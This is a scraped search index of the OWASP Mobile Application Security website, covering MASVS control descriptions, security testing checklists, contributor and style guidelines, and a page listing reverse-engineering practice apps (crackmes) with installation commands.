"},{"location":"MASVS/controls/MASVS-RESILIENCE-4/","title":"MASVS-RESILIENCE-4","text":"The app implements anti-dynamic analysis techniques.
Sometimes pure static analysis is very difficult and time consuming so it typically goes hand in hand with dynamic analysis. Observing and manipulating an app during runtime makes it much easier to decipher its behavior. This control aims to make it as difficult as possible to perform dynamic analysis, as well as prevent dynamic instrumentation which could allow an attacker to modify the code at runtime.
"},{"location":"MASVS/controls/MASVS-STORAGE-1/","title":"MASVS-STORAGE-1","text":"The app securely stores sensitive data.
Apps handle sensitive data coming from many sources such as the user, the backend, system services or other apps on the device and usually need to store it locally. The storage locations may be private to the app (e.g. its internal storage) or be public and therefore accessible by the user or other installed apps (e.g. public folders such as Downloads). This control ensures that any sensitive data that is intentionally stored by the app is properly protected independently of the target location.
"},{"location":"MASVS/controls/MASVS-STORAGE-2/","title":"MASVS-STORAGE-2","text":"The app prevents leakage of sensitive data.
There are cases when sensitive data is unintentionally stored or exposed to publicly accessible locations; typically as a side-effect of using certain APIs, system capabilities such as backups or logs. This control covers this kind of unintentional leaks where the developer actually has a way to prevent it.
"},{"location":"checklists/MASVS-AUTH/","title":"MASVS AUTH","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-AUTH-1 The app uses secure authentication and authorization protocols and follows the relevant best practices. MASVS-AUTH-2 The app performs local authentication securely according to the platform best practices. Testing Confirm Credentials Testing Biometric Authentication Testing Local Authentication MASVS-AUTH-3 The app secures sensitive operations with additional authentication. "},{"location":"checklists/MASVS-CODE/","title":"MASVS CODE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CODE-1 The app requires an up-to-date platform version. MASVS-CODE-2 The app has a mechanism for enforcing app updates. Testing Enforced Updating Testing Enforced Updating MASVS-CODE-3 The app only uses software components without known vulnerabilities. Checking for Weaknesses in Third Party Libraries Checking for Weaknesses in Third Party Libraries MASVS-CODE-4 The app validates and sanitizes all untrusted inputs. Make Sure That Free Security Features Are Activated Testing for Injection Flaws Testing Local Storage for Input Validation Memory Corruption Bugs Testing Object Persistence Testing Implicit Intents Testing for URL Loading in WebViews Testing Object Persistence Memory Corruption Bugs Make Sure That Free Security Features Are Activated "},{"location":"checklists/MASVS-CRYPTO/","title":"MASVS CRYPTO","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-CRYPTO-1 The app employs current strong cryptography and uses it according to industry best practices. Testing Random Number Generation Testing Symmetric Cryptography Testing the Configuration of Cryptographic Standard Algorithms Verifying the Configuration of Cryptographic Standard Algorithms Testing Random Number Generation MASVS-CRYPTO-2 The app performs key management according to industry best practices. Testing the Purposes of Keys Testing Key Management "},{"location":"checklists/MASVS-NETWORK/","title":"MASVS NETWORK","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-NETWORK-1 The app secures all network traffic according to the current best practices. Testing the TLS Settings Testing Data Encryption on the Network Testing Endpoint Identify Verification Testing the Security Provider Testing Data Encryption on the Network Testing Endpoint Identity Verification Testing the TLS Settings MASVS-NETWORK-2 The app performs identity pinning for all remote endpoints under the developer's control. Testing Custom Certificate Stores and Certificate Pinning Testing Custom Certificate Stores and Certificate Pinning "},{"location":"checklists/MASVS-PLATFORM/","title":"MASVS PLATFORM","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PLATFORM-1 The app uses IPC mechanisms securely. Testing for Vulnerable Implementation of PendingIntent Determining Whether Sensitive Stored Data Has Been Exposed via IPC Mechanisms Testing for App Permissions Testing for Sensitive Functionality Exposure Through IPC Testing Deep Links Testing Universal Links Testing UIActivity Sharing Testing UIPasteboard Testing Custom URL Schemes Testing App Permissions Testing App Extensions Determining Whether Sensitive Data Is Exposed via IPC Mechanisms MASVS-PLATFORM-2 The app uses WebViews securely. Testing WebViews Cleanup Testing for Java Objects Exposed Through WebViews Testing WebView Protocol Handlers Testing JavaScript Execution in WebViews Testing iOS WebViews Determining Whether Native Methods Are Exposed Through WebViews Testing WebView Protocol Handlers MASVS-PLATFORM-3 The app uses the user interface securely. Checking for Sensitive Data Disclosure Through the User Interface Testing for Overlay Attacks Finding Sensitive Information in Auto-Generated Screenshots Testing Auto-Generated Screenshots for Sensitive Information Checking for Sensitive Data Disclosed Through the User Interface "},{"location":"checklists/MASVS-PRIVACY/","title":"MASVS PRIVACY","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-PRIVACY-1 The app minimizes access to sensitive data and resources. MASVS-PRIVACY-2 The app prevents identification of the user. MASVS-PRIVACY-3 The app is transparent about data collection and usage. MASVS-PRIVACY-4 The app offers user control over their data. "},{"location":"checklists/MASVS-RESILIENCE/","title":"MASVS RESILIENCE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-RESILIENCE-1 The app validates the integrity of the platform. Testing Root Detection Testing Emulator Detection Testing Jailbreak Detection Testing Emulator Detection MASVS-RESILIENCE-2 The app implements anti-tampering mechanisms. Testing File Integrity Checks Making Sure that the App is Properly Signed Testing Runtime Integrity Checks Testing File Integrity Checks Making Sure that the App Is Properly Signed MASVS-RESILIENCE-3 The app implements anti-static analysis mechanisms. Testing for Debugging Code and Verbose Error Logging Testing for Debugging Symbols Testing Obfuscation Testing for Debugging Code and Verbose Error Logging Testing Obfuscation Testing for Debugging Symbols MASVS-RESILIENCE-4 The app implements anti-dynamic analysis techniques. Testing Anti-Debugging Detection Testing whether the App is Debuggable Testing Reverse Engineering Tools Detection Testing Anti-Debugging Detection Testing Reverse Engineering Tools Detection Testing whether the App is Debuggable "},{"location":"checklists/MASVS-STORAGE/","title":"MASVS STORAGE","text":"Temporary Checklist
This checklist contains the old MASVS v1 verification levels (L1, L2 and R) which we are currently reworking into \"security testing profiles\". The levels were assigned according to the MASVS v1 ID that the test was previously covering and might differ in the upcoming version of the MASTG and MAS Checklist.
For the upcoming of the MASTG version we will progressively split the MASTG tests into smaller tests, the so-called \"atomic tests\" and assign the new MAS profiles accordingly.
MASVS-ID Platform Control / MASTG Test L1 L2 R MASVS-STORAGE-1 The app securely stores sensitive data. Testing the Device-Access-Security Policy Testing Local Storage for Sensitive Data Testing Local Data Storage MASVS-STORAGE-2 The app prevents leakage of sensitive data. Determining Whether Sensitive Data Is Shared with Third Parties via Embedded Services Testing Backups for Sensitive Data Testing Logs for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties via Notifications Testing Memory for Sensitive Data Determining Whether the Keyboard Cache Is Disabled for Text Input Fields Testing Memory for Sensitive Data Determining Whether Sensitive Data Is Shared with Third Parties Testing Backups for Sensitive Data Checking Logs for Sensitive Data Finding Sensitive Data in the Keyboard Cache "},{"location":"contributing/1_How_Can_You_Contribute/","title":"How Can You Contribute?","text":"You can directly contribute to the MASVS or MASTG in many different ways! First, go ahead and create a GitHub account for free on the GitHub homepage.
"},{"location":"contributing/1_How_Can_You_Contribute/#contribution-flow","title":"Contribution Flow","text":"flowchart LR\n A(Open Discussion) -->|discuss| C{qualifies?}\n C -->|Yes| D(Issue)\n C -->|No| E[Close]\n D -->|open PR| F(Pull Request)\n F -->|review| G{approved?}\n F -->|make changes| F\n G -->|Yes| H[Merge]\n G -->|No| I[Close]
"},{"location":"contributing/1_How_Can_You_Contribute/#participate-in-discussions","title":"\ud83d\udcac Participate in Discussions","text":"Our GitHub Discussions are the first place to go to ask questions, give feedback, and propose new ideas. If your proposal qualifies for the MASTG/MASVS, we'll convert it into an \"Issue\" (the discussion might take a while).
"},{"location":"contributing/1_How_Can_You_Contribute/#create-issues","title":"\ud83c\udfaf Create Issues","text":"Before creating a PR, first create an Issue to be discussed for missing requirements, content or errors.
You can contribute with content or corrections by opening a Pull Request (PR).
Learn how to open a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#become-a-reviewer","title":"\u2705 Become a Reviewer","text":"You can Review Pull Requests (PRs) and also gain contributions. If you are a fluent speaker in any of the different languages that the MASVS is available in, feel free to give feedback on any of the submitted PRs.
After your PR or issue has been submitted, we will review it as quickly as possible which typically only takes a few days. If you think we have forgotten about it, feel free to give us a nudge after 7 days have passed.
Learn how to review a PR here.
"},{"location":"contributing/1_How_Can_You_Contribute/#proof-reading","title":"\ud83d\udd0e Proof-reading","text":"If you do proof-reading, these are the things we\u2019re looking for:
Refer to Google Technical Writing trainings for more info:
First of all Create a GitHub account (a free one is enough) by following these steps.
Our workflow is like this:
Open a Discussion (for ideas and proposals) If your proposal qualifies for the MASTG/MASVS we'll convert it into an \"Issue\" (the discussion might take a while).
MASVS Example: \"Add a MASVS-CRYPTO requirement on Key rotation\"
MASTG Example: \"Add a Test case for key rotation\"
Open an Issue (for concrete actionable things that have to / could be done) For instance, there's a typo, or it's clear that a certain Test case doesn't have e.g. \"Dynamic Analysis\" and it should be added.
Normally, contributors should follow the whole flow. But sometimes it's clear what's needed so we directly go to 2 (open an issue) or even to 3 (open a PR). We recommend starting with a discussion or directly contacting us to save you the hurdle of writing and submitting new content that does not qualify so we have to reject it after the work is done.
If you just have an specific question you can post it to (you need a GitHub Account):
\"GitHub Discussions\" are re-posted to our Slack channel.
Once you get your answer please mark it as answered. When you mark a question as an answer, GitHub will highlight the comment and replies to the comment to help visitors quickly find the answer.
"},{"location":"contributing/2_Getting_Started/#contribute-online","title":"Contribute Online","text":"GitHub makes this extremely easy.
For small changes in one file:
For more complex changes or across files:
.
while browsing the repo or pull request.Learn more about the github.dev Web-based Editor in \"GitHub Docs\".
"},{"location":"contributing/2_Getting_Started/#contribute-offline","title":"Contribute Offline","text":"For this you need an IDE or text editor and git on your machine. We recommend using the free Visual Studio Code editor with the markdownlint extension.
$ git clone https://github.com/<your_github_user>/owasp-masvs.git\n$ cd owasp-masvs/\n$ git remote add upstream git@github.com:OWASP/owasp-masvs.git\n
$ git checkout -b fix-issue-1456\n
git add MYFILE
for every file you have modified, followed by git commit -m 'Your Commit Message'
to commit the modifications and git push
to push your modifications to GitHub.You can create a Pull Request (PR) by following these steps. Remember that:
master
.#<issue-id>
\".Your PR will be reviewed soon (refer to this page to learn more about reviews).
Before opening a PR please self-review your changes in GitHub and ensure that you follow our style guide to speed up the review process\u26a1
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-incorporate-the-reviewers-feedback-to-your-pr","title":"How to Incorporate the Reviewer's Feedback to your PR","text":"It might be directly approved and merged or one of our reviewers will send you some comments and suggested changes.
When reviewers suggest changes in a pull request, you can automatically incorporate the changes into your PR.
NOTE: Remember to regularly sync your fork with the upstream repo. This gets you the latest changes and makes easier to merge your PR.
git pull upstream/master\n
"},{"location":"contributing/3_PRs_and_Reviews/#how-to-review-a-pr","title":"How to Review a PR","text":"If you'd like to review an open PR please follow these steps:
"},{"location":"contributing/3_PRs_and_Reviews/#step-1-comment-and-suggest-changes","title":"Step 1: Comment and Suggest Changes","text":"You can enter single or multi-line comments (click and drag to select the range of lines):
Always prefer making \"Suggested Changes\" using the \u00b1
button:
If the suggestion you'd like to make cannot be expressed using \"suggested changes\" please enter a clear comment explaining what should be fixed (e.g. some paragraphs don't link properly or some essential information cannot be found and should be added).
Using \"Suggested Changes\" saves you as a reviewer and the PR author a lot of time. And you get points (attributions) for the changes that you suggested (if the author commits them you become a co-author of those commits). If you're constant with your reviewer work you can apply to be recognize as an official reviewer in our Acknowledgements page.
"},{"location":"contributing/3_PRs_and_Reviews/#step-2-submit-your-review","title":"Step 2: Submit your Review","text":"Once you went through the whole PR you can submit your review
Learn more: \"(GitHub Docs) Reviewing proposed changes in a pull request\".
"},{"location":"contributing/4_Add_new_Language/","title":"Add a New Language","text":""},{"location":"contributing/4_Add_new_Language/#mastg-translations","title":"MASTG Translations","text":"The MASTG is a living document that changes and adapts to the most recent security recommendations every day. While we do want to reach the maximum audience possible, our past experience shows that maintaining translations has proven to be an extremely challenging task. Therefore, please understand that any PRs containing MASTG translations will be declined, but you're free to do them on your own forks.
\ud83c\uddef\ud83c\uddf5 A translation of the MASTG into Japanese is available on Github: https://github.com/coky-t/owasp-mstg-ja. Thanks to @coky-t for pushing this forward!
That said, we **strongly encourage further translations of the MASVS as it is much easier to maintain and you'll get a translated Mobile App Security Checklists mapping to the MASTG for free.
"},{"location":"contributing/4_Add_new_Language/#masvs-translations","title":"MASVS Translations","text":"To add a new language you have to follow the steps from both sections below.
Document-ja
.metadata.md
from another language and modify it for the new language.export.py
.github/workflows/docgenerator.yml
and add the action steps for the new language.../LANGS.md
to include the new language.../README.md
with the newly available language.IMPORTANT: only after releasing the MASVS!
src/scripts/gen_all_excel.sh
.The following rules are meant to ensure consistency of the MASTG:
We recommend you to take these free Google courses when writing or reviewing content for the MAS project:
The primary measure for amount of content on a page should be based on the purpose it serves.
Those containing one or two screens of text at most. Users are scanning for link choices. Use longer pages (those that require more scrolling or reading) deeper within the chapter where content can be printed and read later.
Consider creating a supporting document and linking to it from the page rather than displaying all the information directly on the page.
"},{"location":"contributing/5_Style_Guide/#gender-neutrality","title":"Gender Neutrality","text":"The MASTG reaches all kind of people all over the world. To ensure inclusiveness and diversity, please refrain from using the following throughout the book:
Or any other constructions like \"he/she\", \"s/he\", \"his or her\". Instead, use the following gender-neutral alternatives:
There is one exception: We are still using \"man in the middle\", as it is simply a common term in the industry and there is no common replacement for it.
"},{"location":"contributing/5_Style_Guide/#timeliness-of-content","title":"Timeliness of Content","text":"Keeping accurate and timely content establishes the OWASP MAS deliverables as a credible and trustworthy source of information.
When using statistical data on your page, ensure that the information is current and up-to-date and is accompanied by the source from which it was derived, along with the date the data was compiled.
"},{"location":"contributing/5_Style_Guide/#content-for-the-digital-platform-versus-for-print","title":"Content for the Digital Platform Versus for Print","text":"Write concise content that the user can read quickly and efficiently. For digital content - create shorter pages that are cross-linked. If your content is likely to be printed, create one long page.
"},{"location":"contributing/5_Style_Guide/#audience","title":"Audience","text":"Write for an international audience with a basic level of technical understanding i.e. they have a mobile phone and know how to install an app. Avoid hard-to-translate slang words/phrases to ensure content is accessible to readers who aren't native English speakers.
"},{"location":"contributing/5_Style_Guide/#context-and-orientation","title":"Context and Orientation","text":"Let the users know where they are on every page. Establish the topic by using a unique page heading.
Include a clear and concise introduction where possible.
Link to background information where necessary.
"},{"location":"contributing/5_Style_Guide/#write-so-people-will-read-with-joy","title":"Write so People Will Read with Joy","text":"Use the following methods to increase scannability:
-
rather than asterisks *
for listsFor longer pages, use the following tools to make the page easily scannable:
When presenting your content in a list format:
When using a number between zero and ten, spell out the number (e.g., \"three\" or \"ten\").
When using any number higher than ten, use the numeric version (e.g., \"12\" or \"300\").
"},{"location":"contributing/5_Style_Guide/#2-language","title":"2. Language","text":""},{"location":"contributing/5_Style_Guide/#american-spelling-and-terminology","title":"American Spelling and Terminology","text":"Use American spelling and terminology.
Change all British spelling and terminology to the American equivalents where applicable. This includes \"toward\" (US) vs. \"towards\" (UK), \"among\" (US) vs. \"amongst\" (UK), \"analyze\" (US) vs. \"analyse\" (UK), \"behavior\" (US) vs \"behaviour\" (UK), etc.
"},{"location":"contributing/5_Style_Guide/#plurals","title":"Plurals","text":"Adhere to standard grammar and punctuation rules when it comes to pluralization of typical words.
The plural of calendar years does not take the apostrophe before the \"s\". For example, the plural form of 1990 is 1990s.
"},{"location":"contributing/5_Style_Guide/#title-capitalization","title":"Title Capitalization","text":"We follow the title case rules from the \"Chicago Manual of Style\":
When in doubt, you can verify proper capitalization on https://titlecaseconverter.com/.
"},{"location":"contributing/5_Style_Guide/#standardization","title":"Standardization","text":"This is a list of words/abbreviations that are used inconsistently at the moment in the MASTG and need standardization:
Use the following common contractions:
Abbreviations include acronyms, initialisms, shortened words, and contractions.
The following snippet demonstrates most of these points:
## JAR Files\n\nJAR (Java ARchive) files are [...]\n\nAPKs are packed using the ZIP format. An APK is a variation of a JAR file [...]\n
For commonly used file formats such as APK, IPA or ZIP, please do not refer to them as \".apk\", \".ipa\" or \".zip\" unless you're explicitly referring to the file extension.
"},{"location":"contributing/5_Style_Guide/#referencing-android-versions","title":"Referencing Android versions","text":"Use the following format when referring to an Android version: Android X (API level YY). Usage of the descriptive name (Ex: Oreo) is discouraged.
Ex: Android 9 (API level 28)
"},{"location":"contributing/5_Style_Guide/#addressing-the-reader-in-test-cases","title":"Addressing the Reader in Test Cases","text":"Throughout the guide, you may want to address the readers in order to tell them what to do, or what they should notice. For any such case, use an active approach and simply address the reader using \"you\".
Correct: If you open the AndroidManifest.xml file, you will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If you run the following command, you will see that atr1 is actually dangerous: [...].
Wrong: The AndroidManifest.xml file contains an Application tag, with the following attributes: atr1, atr2 and atr3. The command below shows that atr1 is dangerous: [...].
Wrong: If we open the AndroidManifest.xml file, we will see a main Application tag, with the following attributes: atr1, atr2 and atr3. If we run the following command, we will see that atr1 is actually dangerous: [...].
"},{"location":"contributing/5_Style_Guide/#3-external-references","title":"3. External References","text":""},{"location":"contributing/5_Style_Guide/#web-links","title":"Web Links","text":"Use markdown's in-line link format (A) [TEXT](URL \"TITLE\")
or (B) [TEXT](URL)
.
For example:
The [threat modeling guidelines defined by OWASP](https://owasp.org/www-community/Threat_Modeling \"OWASP Threat Modeling\") are generally applicable to mobile apps.\n
When using (A), be sure to escape special characters such as apostrophe (\\') or single quote (`), as otherwise the link will be broken in Gitbook.
Wrong usage, see \"iPhone's\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone's UDID\")\n
Right usage, see \"iPhone\\'s\":
[UDID of your iOS device via iTunes](https://medium.com/@igor_marques/how-to-find-an-iphones-udid-2d157f1cf2b9 \"How to Find Your iPhone\\'s UDID\")\n
When adding links to the \"References\" section at the end of the chapters use - Title - <url>
. This is needed to force latex to print URLs properly for the PDF.
For example:
- adb - <https://developer.android.com/studio/command-line/adb>\n
"},{"location":"contributing/5_Style_Guide/#books-and-papers","title":"Books and Papers","text":"For books and papers, use the following format: [#NAME]
.
And include the full reference in the \"References\" section at the end of the markdown file manually. Example:
An obfuscated encryption algorithm can generate its key (or part of the key)\nusing data collected from the environment [#riordan].\n
And under the \"References\" section at the end of the chapters:
- [#riordan] - James Riordan, Bruce Schneier. Environmental Key Generation towards Clueless Agents. Mobile Agents and Security, Springer Verlag, 1998\n
Papers:
The general form for citing technical reports is to place the name and location of the company or institution after the author and title and to give the report number and date at the end of the reference.
Basic Format:
- [shortname] J. K. Author, \"Title of report,\" Abbrev. Name of Co., City of Co., Abbrev. State, Rep. xxx, year\n\n- [shortname] \\[Author(s)\\], \\[Title\\] - Link\n
Books:
- [shortname] \\[Author(s)\\], \\[Title\\], \\[Published\\], \\[Year\\]\n\n- [examplebook] J. K. Author, \"Title of chapter in the book,\" in Title of His Published Book, xth ed. City of Publisher, Country if not USA: Abbrev. of Publisher, year, ch. x, sec. x, pp. xxx-xxx.\n
NOTE: Use et al. when three or more names are given
e.g.
- [klaus] B. Klaus and P. Horn, Robot Vision. Cambridge, MA: MIT Press, 1986.\n- [stein] L. Stein, \"Random patterns,\" in Computers and You, J. S. Brake, Ed. New York: Wiley, 1994, pp. 55-70.\n- [myer] R. L. Myer, \"Parametric oscillators and nonlinear materials,\" in Nonlinear Optics, vol. 4, P. G. Harper and B. S. Wherret, Eds. San Francisco, CA: Academic, 1977, pp. 47-160.\n- [abramowitz] M. Abramowitz and I. A. Stegun, Eds., Handbook of Mathematical Functions (Applied Mathematics Series 55). Washington, DC: NBS, 1964, pp. 32-33.\n
"},{"location":"contributing/5_Style_Guide/#4-references-within-the-guide","title":"4. References Within The Guide","text":"For references to other chapters in the MASTG, simply name the chapter, e.g.: See also the chapter \"Basic Security Testing\"
, See the section \"Apktool\" in the chapter \"Basic Security Testing\"
etc. The MASTG should be convenient to read as a printed book, so use internal references sparingly. Alternatively you can create a link for the specific section:
See the section \"[App Bundles](0x05a-Platform-Overview.md#app-bundles)\" in the chapter ...\n
Note that in such a case the anchor (everything after the #
) should be lowercase, and spaces should be replaced with hyphens.
Pictures should be uploaded to the Images/Chapters directory. Afterwards they should be embedded by using the image tag, a width of 500px should be specified. For example:
<img src=\"Images/Chapters/0x06d/key_hierarchy_apple.jpg\" width=\"500px\"/>\n- *iOS Data Protection Key Hierarchy*\n
"},{"location":"contributing/5_Style_Guide/#6-punctuation-conventions","title":"6. Punctuation Conventions","text":""},{"location":"contributing/5_Style_Guide/#lowercase-or-capital-letter-after-a-colon","title":"Lowercase or Capital Letter after a Colon","text":"Chicago Manual of Style (6.61: Lowercase or capital letter after a colon) says: lowercase the first word unless it is a proper noun or the start of at least two complete sentences or a direct question.
"},{"location":"contributing/5_Style_Guide/#serial-comma-use","title":"Serial Comma Use","text":"Use a serial comma before \"and\" for the last item in a run-in list of three or more items. For example:
We bought apples, oranges, and tomatoes from the store.
"},{"location":"contributing/5_Style_Guide/#quote-marks-and-apostrophes","title":"Quote Marks and Apostrophes","text":"Use straight double quotes, straight single quotes, and straight apostrophes (not curly quotes/apostrophes).
"},{"location":"contributing/5_Style_Guide/#technical-terms","title":"Technical Terms","text":"Spell/punctuate specific technical terms as they are used by the company (e.g., use the company website).
In order of preference, spell/punctuate generic technical terms according to
Markdown blockquotes can be used for comments in the documents by using >
> This is a blockquote\n
"},{"location":"contributing/5_Style_Guide/#8-code-and-shell-commands","title":"8. Code and Shell Commands","text":"Use code blocks when including sample code, shell commands, and paths. In Markdown, code blocks are denoted by triple backticks (```
). GitHub also supports syntax highlighting for a variety of languages. For example, a Java code block should be annotated as follows:
```java\n public static void main(String[] args) { System.out.println(\" Hello World!\"); } } ;\n ```\n
This produces the following result:
public static void main(String[] args) { System.out.println(\" Hello World!\"); } }\n
When including shell commands, make sure to the language for correct syntax highlighting (e.g. shell
or bash
) and remove any host names and usernames from the command prompt, e.g.:
```shell\n $ echo 'Hello World'\n Hello World\n ```\n
When a command requires parameters that need to be modified by the reader, surround them with angle brackets:
$ adb pull <remote_file> <target_destination>\n
"},{"location":"contributing/5_Style_Guide/#in-text-keywords","title":"In-text Keywords","text":"When they do not occur in a code block, place the following code-related keywords in backticks (``
), double straight quote marks (\"\"
), or leave unpunctuated according to the table:
true
, 0
, YES
) XML attributes (e.g., get-task-allow
on iOS Plists, \"@string/app_name\"
on Android Manifests) XML attribute values (e.g., android:label
on Android Manifests) property names object names API calls interface names If nouns in backticks are plural, place the \"s\" after the second backtick (e.g. RuntimeException
s). Do not add parentheses, brackets, or other punctuation to any keywords that are in backticks (e.g., main
not main()
).
When referring to any UI element by name, put its name in boldface, using **<name>**
(e.g., Home -> Menu).
The MAS project is a powerful learning resource and the MAS Crackmes are no exception. They allow the MAS community not only to practice the MAS skills they've learned from the MASTG but also let them confirm their approaches to the used techniques, especially when performing reverse engineering.
"},{"location":"contributing/6_Add_a_Crackme/#who-can-contribute-with-a-crackme","title":"Who Can Contribute with a Crackme?","text":"Anyone from individuals to companies. You only have to read and accepts the Terms and Conditions listed below.
Before submitting a crackme, first of all contact the MAS team here: https://mas.owasp.org/contact/
"},{"location":"contributing/6_Add_a_Crackme/#terms-and-conditions","title":"Terms and Conditions","text":"If you want to contribute to the MAS crackmes please consider that:
\u2611\ufe0f The source code of the crackme apps must be made publicly available at https://github.com/OWASP/mas-crackmes.
\u2611\ufe0f The crackme apps must be reviewed and approved by the MAS project leaders. Some form of documentation and solution writeup/video must be provided for the review process. That must include a list of \"features\" including techniques used (e.g. obfuscation, whitebox crypto, inline assembly, etc.)
\u2611\ufe0f The crackme apps must not contain any company branding or advertising material (ads, company URL, etc.).
\u2611\ufe0f The crackme apps must align with the MASVS and MASTG in some way.
\u2611\ufe0f The crackme authors are fully responsible for the maintenance of the crackme in the case bugfixes or updates are needed and the MAS team is not able to perform those actions.
"},{"location":"contributing/6_Add_a_Crackme/#publishing-and-acknowledgements","title":"Publishing and Acknowledgements","text":"When successfully adding a crackme, its authors will be credited in the corresponding crackme page in the project website at https://mas.owasp.org/crackmes and an announcement will be made via the official MAS social media channels.
"},{"location":"contributing/6_Add_a_Crackme/#owasp-openness-and-licencing-guidelines","title":"OWASP Openness and Licencing Guidelines","text":"The OWASP projects have a strong foundation in openness and this includes all material related to the projects.
OWASP Projects must be open in all facets, including source material, contributors, organizational structure, and finances (if any). Project source code (if applicable) must be made openly available, project communication channels (e.g. mailing lists, forums) should be open and free from censorship, and all project materials must be licensed under a community friendly license as approved by the Free Software Foundation (Appendix 8.2).
Please refer to the OWASP Project Leader Handbook that we as project leaders need to comply with: https://owasp.org/www-pdf-archive/PROJECT_LEADER-HANDBOOK_2014.pdf
"},{"location":"crackmes/","title":"MAS Crackmes","text":"Welcome to the MAS Crackmes aka. UnCrackable Apps, a collection of mobile reverse engineering challenges. These challenges are used as examples throughout the OWASP MASTG. Of course, you can also solve them for fun.
Android UnCrackable L1 UnCrackable-Level1.apk Download Android UnCrackable L2 UnCrackable-Level2.apk Download Android UnCrackable L3 UnCrackable-Level3.apk Download Android UnCrackable L4 r2pay-v0.9.apk Download Android UnCrackable DRM validate (ELF 32-bit) Download iOS UnCrackable L1 UnCrackable-Level1.ipa Download iOS UnCrackable L2 UnCrackable-Level2.ipa Download "},{"location":"crackmes/Android/","title":"Android Crackmes","text":""},{"location":"crackmes/Android/#android-uncrackable-l1","title":"Android UnCrackable L1","text":"A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level1.apk\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#android-uncrackable-l2","title":"Android UnCrackable L2","text":"This app holds a secret inside. May include traces of native code.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level2.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Michael Helwig for finding and fixing an oversight in the anti-tampering mechanism.
"},{"location":"crackmes/Android/#android-uncrackable-l3","title":"Android UnCrackable L3","text":"The crackme from hell! A secret string is hidden somewhere in this app. Find a way to extract it.
Download
InstallationThis app is compatible with Android 4.4 and up.
$ adb install UnCrackable-Level3.apk\n
SPOILER (Solutions) By Bernhard Mueller. Special thanks to Eduardo Novella for testing, feedback and pointing out flaws in the initial build(s).
"},{"location":"crackmes/Android/#android-uncrackable-l4","title":"Android UnCrackable L4","text":"The Radare2 community always dreamed with its decentralized and free currency to allow r2 fans to make payments in places and transfer money between r2 users. A debug version of the r2Pay app has been developed and it will be supported very soon in many stores and websites. Can you verify that this is cryptographically unbreakable?
Hint: Run the APK in a non-tampered device to play a bit with the app.
r2con{PIN_NUMERIC:SALT_LOWERCASE}
r2con{ascii(key)}
Versions:
Download v0.9
Download v1.0
v0.9
- Release for OWASP MAS: Source code is available and the compilation has been softened in many ways to make the challenge easier and more enjoyable for newcomers.v1.0
- Release for R2con CTF 2020: No source code is available and many extra protections are in place.This app is compatible with Android 4.4 and up.
$ adb install r2pay-v0.9.apk\n
SPOILER (Solutions) Created and maintained by Eduardo Novella & Gautam Arvind. Special thanks to NowSecure for supporting this crackme.
"},{"location":"crackmes/Android/#android-license-validator","title":"Android License Validator","text":"A brand new Android app sparks your interest. Of course, you are planning to purchase a license for the app eventually, but you'd still appreciate a test run before shelling out $1. Unfortunately no keygen is available! Generate a valid serial key that is accepted by this app.
Download
InstallationCopy the binary to your Android device and run using the shell.
